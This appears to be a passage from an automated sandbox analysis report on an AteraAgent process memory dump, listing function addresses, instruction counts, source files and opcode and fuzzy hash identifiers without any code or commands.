                                                                                                                                                                                                                                          • Instruction ID: 2b57253321536102a3209ea62c2993247f2dc41a6bdf5ae617c1e08e280c91af
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: daccaf779c126b5cbb7023cda3265ba7c008199f31e122727d7fabc54b22b5da
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 13F0F42560EACA0FE33697BC84645A07FE1AF46314B4E01F6C488CB2A7DA18E9859341
                                                                                                                                                                                                                                          Function 00007FFD9B419E95 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 8849fbb5f95d70def27f6356ff1a89827fb1b131e4fe19f21e1ed13984273f96
                                                                                                                                                                                                                                          • Instruction ID: 2c796e68d9184d69be9e10ddbddd23e2c66450dbd1f518aada78187411b9ad23
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8849fbb5f95d70def27f6356ff1a89827fb1b131e4fe19f21e1ed13984273f96
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66F0E901F0FE8E1FD666D25C187C1A41BC1DBA552434A11F6C48CC71E7EC0C59435382
                                                                                                                                                                                                                                          Function 00007FFD9B414B1D Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 79dd232980e52224ab3c20bd605cb2188f09b3e3bc8201685bc082f8569536b4
                                                                                                                                                                                                                                          • Instruction ID: 90b32ff2edc2a09b6032e3711215c8654147a21609e2ce505b9f54f137f75223
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 79dd232980e52224ab3c20bd605cb2188f09b3e3bc8201685bc082f8569536b4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6101D63090A68D8FDB54EF54C8612E97BA1FF66304F4214B9E40CC7692DA79E950CB81
                                                                                                                                                                                                                                          Function 00007FFD9B415708 Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 8d75cf78de0c9bd3ec56be2b03e127f9f9125224f5501f3e4325dc30a1c347e5
                                                                                                                                                                                                                                          • Instruction ID: 5bdf701abcea6cbe934350fda55eb47a92ea68a389b955b77e422f66988ce815
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d75cf78de0c9bd3ec56be2b03e127f9f9125224f5501f3e4325dc30a1c347e5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E4F0F962D0F14E9BE724AAA4D8A21F477A0FF21308F062175E0BC571E3EE5A6A049380
                                                                                                                                                                                                                                          Function 00007FFD9B413E50 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 0f5c8f94e1346610ea65bfd8996d6fb9e379abbb752840db003fd7d4a9a0ff0c
                                                                                                                                                                                                                                          • Instruction ID: 90c3417efc41795f83157cb852effa8fd28b0e68eb3c0595619cc04303e88b0f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0f5c8f94e1346610ea65bfd8996d6fb9e379abbb752840db003fd7d4a9a0ff0c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6BF08C30D4970C9BD7209EA5A0003F9F7B4EB4A309F412079D40CA2190C37A9695CF18
                                                                                                                                                                                                                                          Function 00007FFD9B415038 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 8a18f9ed32f2b0b5527e6c188df1f3ea06548ea280c905e9e5900b7a3611eda1
                                                                                                                                                                                                                                          • Instruction ID: c87a2fe64eeffc3363c99207ce741216dc1d017fdac54d6a09b23884adc6bddf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a18f9ed32f2b0b5527e6c188df1f3ea06548ea280c905e9e5900b7a3611eda1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ACF06D31F1592D8EDBA4DF589860AE8B372FB55214F0000B6D01DD3285CE3569818B41
                                                                                                                                                                                                                                          Function 00007FFD9B424F25 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 65523c004c038224d081c1b3d771d9bdcde7c15c25ba1bd4e610f95d814b03fb
                                                                                                                                                                                                                                          • Instruction ID: 85f4381472d976dba5de1ae44815b50fe7c3d06a58994136627d9be4334b2dc3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 65523c004c038224d081c1b3d771d9bdcde7c15c25ba1bd4e610f95d814b03fb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26F0E931919A4E4FD365DB9884656A077E0FF48310B5701AAD448C72A7EA18ED9197C0
                                                                                                                                                                                                                                          Function 00007FFD9B428C7B Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 5f5207ab67920046f6744349295683560ded4dcfcbdd16b18cc61237fe247852
                                                                                                                                                                                                                                          • Instruction ID: ee0f708a1982195df32d82949ef3bee0755773c1d36e3d71028ca3b7530d21e8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5f5207ab67920046f6744349295683560ded4dcfcbdd16b18cc61237fe247852
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ACF0B42230E98D4FDBE0CA5CE4D4BA5B3E2EF95314F480179D04DC7256C631AC459781
                                                                                                                                                                                                                                          Function 00007FFD9B418CE8 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 264c7b04bfb64aef578ebb84460eedb36bf3393dde5bd70f2c2990974b893235
                                                                                                                                                                                                                                          • Instruction ID: 002e68c3e953e6e4883e90fceedd997d82363a65d2ea4a91fab5cd33244c0db6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 264c7b04bfb64aef578ebb84460eedb36bf3393dde5bd70f2c2990974b893235
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BEF0A030C4A60D8FDB249E94A4003FCB3B4FB1A209F413239D00DB2180C37A9B94CB25
                                                                                                                                                                                                                                          Function 00007FFD9B428FB4 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 390a9a3f9def8ba3cf591b89f584fa552a95f005a8e125e13f110608fea70cf3
                                                                                                                                                                                                                                          • Instruction ID: 5428fa13dcb44ec2678b7de67e5b012788519735cd9bfb251237d26a7d866d57
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 390a9a3f9def8ba3cf591b89f584fa552a95f005a8e125e13f110608fea70cf3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64F0902630EA8D4FDBA0CA88D4D8B65B7A2FFA5314F4A01B8D44CC7256C635AC45D782
                                                                                                                                                                                                                                          Function 00007FFD9B422DE8 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 722b8b8140ed93174871f895fb6bf68cbd866ac467071b30a65779275eb6366c
                                                                                                                                                                                                                                          • Instruction ID: b8fa5f6342922b5bf39cbe0bcb46b8e52999ed8a281f8f2ad3944a1a15de9faa
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 722b8b8140ed93174871f895fb6bf68cbd866ac467071b30a65779275eb6366c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22F0EC31759D1D4BE9A8F36850A5BBA23D1FF94710F450039D44EC22D6DD59A9826380
                                                                                                                                                                                                                                          Function 00007FFD9B426182 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 636243afd6c34e7d7f4ff17e7a7f43f80cefefcb04c51019ad0a93fa663c1a4a
                                                                                                                                                                                                                                          • Instruction ID: 012d17ebbbbfd668a1359657f49e6627e739eb5ce79c3214ec5d9ba1b2515d88
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 636243afd6c34e7d7f4ff17e7a7f43f80cefefcb04c51019ad0a93fa663c1a4a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3F0904190E2C40FE7169778482A265BFE1AF97214F4E81FAC488DF1A3D92CA5099312
                                                                                                                                                                                                                                          Function 00007FFD9B42FC51 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: c39902fc7487984adad4267aee611e768cb3ce188efb5f9243fc572241bcfb4a
                                                                                                                                                                                                                                          • Instruction ID: 5786c4551c07e2e37fa876716f617f509de401f84407c133a6ef32118e2e97f0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c39902fc7487984adad4267aee611e768cb3ce188efb5f9243fc572241bcfb4a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BEE0DF33B0D9484BEB58C99C284A1FE73E2E7D9125B10427FD14EC2618C92298068380
                                                                                                                                                                                                                                          Function 00007FFD9B41BC4A Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d94ed534caedf3830818bd9de605f66620902db806d9b2d8906fd0272419226f
                                                                                                                                                                                                                                          • Instruction ID: d8a3a9bffd5b6db16e4d00916b0549eb15ab9b94e62b469523132bd8f4586a2b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d94ed534caedf3830818bd9de605f66620902db806d9b2d8906fd0272419226f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FCF05475E2550D5FEB88F7988895EAC73F2FF98B40F554074E058932A2DE296C018700
                                                                                                                                                                                                                                          Function 00007FFD9B41AF5E Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: f683de1cc4180c7ca6a499d288bd137a410b57571d6a10c05ff3a1881f5319a5
                                                                                                                                                                                                                                          • Instruction ID: aec29fdb4df9ea4aa4bb5fe77a1e2b7a2f64ec95bd9b25a3c150aa66f75afc73
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f683de1cc4180c7ca6a499d288bd137a410b57571d6a10c05ff3a1881f5319a5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C3E02681D1F6DE5FE7625BF4482A8907FA0AF2B210B4D81F6D09CCF0B3E54DA5459302
                                                                                                                                                                                                                                          Function 00007FFD9B41A0A5 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: fb33f72e208804ba00090835cca08ef8f86718a30f74eb47f17a9153ca148fae
                                                                                                                                                                                                                                          • Instruction ID: 93810172e3f89f9510a32fa9075321d0ff2acf10795a8e1355c4f31218ede115
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fb33f72e208804ba00090835cca08ef8f86718a30f74eb47f17a9153ca148fae
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 72E06832F1110C67CF146B98F411AFABB70EB40320F1000FBC42CDB043CE2014918780
                                                                                                                                                                                                                                          Function 00007FFD9B41A0A8 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 5ed216181d8c06f57fee6511ce1e72d8b04e060a62d03051466b297df9fc06dc
                                                                                                                                                                                                                                          • Instruction ID: 07c814b1558758efc27e619b85be503fba9c15b2f64d58d2c308e6e342b79079
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5ed216181d8c06f57fee6511ce1e72d8b04e060a62d03051466b297df9fc06dc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E6E0D871E1100957DB147B94B421AF9B771EB00320F1001FBC42D97087DE6115904780
                                                                                                                                                                                                                                          Function 00007FFD9B418075 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 272c44dbc2ab1b5409a5537af092a2f046ab3090d767f58c335bff353779c722
                                                                                                                                                                                                                                          • Instruction ID: fb2d092526a7112c4051149bc4022136f0860696172f294e096a993bc2efeac2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 272c44dbc2ab1b5409a5537af092a2f046ab3090d767f58c335bff353779c722
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 81E0E531E1441C8ECB54EF68E851BECB7B1FF44205F4040BAE01CE3286CA7969818B00
                                                                                                                                                                                                                                          Function 00007FFD9B424190 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 0f4d0d0862b7e8a7641ca14cc7544544f854b52f7f435b74ef6faaa75a0c8b6a
                                                                                                                                                                                                                                          • Instruction ID: abe842c332111deaa2259cd7b1bf5633a908342d219931ad8b38dfc513d99cdf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0f4d0d0862b7e8a7641ca14cc7544544f854b52f7f435b74ef6faaa75a0c8b6a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53E01A30A0541D4EEB68EAA8C8557BCB3B5FF54314F10017A900DD3292CF3469028B40
                                                                                                                                                                                                                                          Function 00007FFD9B42EE10 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 7eb26bf705fc8d826dbaff8fe54f98b44f3874ad8ae9bdb8f76b2864dec3418a
                                                                                                                                                                                                                                          • Instruction ID: 03b1036bb1fa49668f8fd3a1433b2076356cb24791fb633b6888b16a5d3212b1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7eb26bf705fc8d826dbaff8fe54f98b44f3874ad8ae9bdb8f76b2864dec3418a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E9D0A710E1540E8FE950B6DD589224132A1BF45218F8900B0E859EB363F68F9D449382
                                                                                                                                                                                                                                          Function 00007FFD9B422993 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 240bd9b5b4b724dd2fad303ccb42b7b2ff123714c06c209c2d968341619cb794
                                                                                                                                                                                                                                          • Instruction ID: e46881916ef9f5a25fa47a40ef57b3a0e0f44e84d6396ffab009c19fb79528d3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 240bd9b5b4b724dd2fad303ccb42b7b2ff123714c06c209c2d968341619cb794
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78D05E306092414FCB58AF28A080C80B790EF1221835509E8E0158B1E7C52ADC86CB01
                                                                                                                                                                                                                                          Function 00007FFD9B428737 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: a44185714bcb740b8c4ba8ef5443f88f164e0cc6e77e98981add75077ca76bc2
                                                                                                                                                                                                                                          • Instruction ID: eb8da7274ba7b36c9a05f51415458518676c989a5f1a734f6fec52f075473aee
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a44185714bcb740b8c4ba8ef5443f88f164e0cc6e77e98981add75077ca76bc2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3DC0123124641C8FDAD0964CF8487647390EB45221F4602F1E00CDA155C95658455700
                                                                                                                                                                                                                                          Function 00007FFD9B41AAE0 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 25a06580e7b2c42d0ac187b5a5ef4f0898837eb4e33d6ad49e3c09b5f21fce48
                                                                                                                                                                                                                                          • Instruction ID: d88e873161da5fab58f8814c729eccdb37ff94c1e12eedefa2c81cb0b29a9345
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 25a06580e7b2c42d0ac187b5a5ef4f0898837eb4e33d6ad49e3c09b5f21fce48
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3DC08C20E6590D8AC728B76844810187690FF08204FC001F4E01CC2284D66D91405706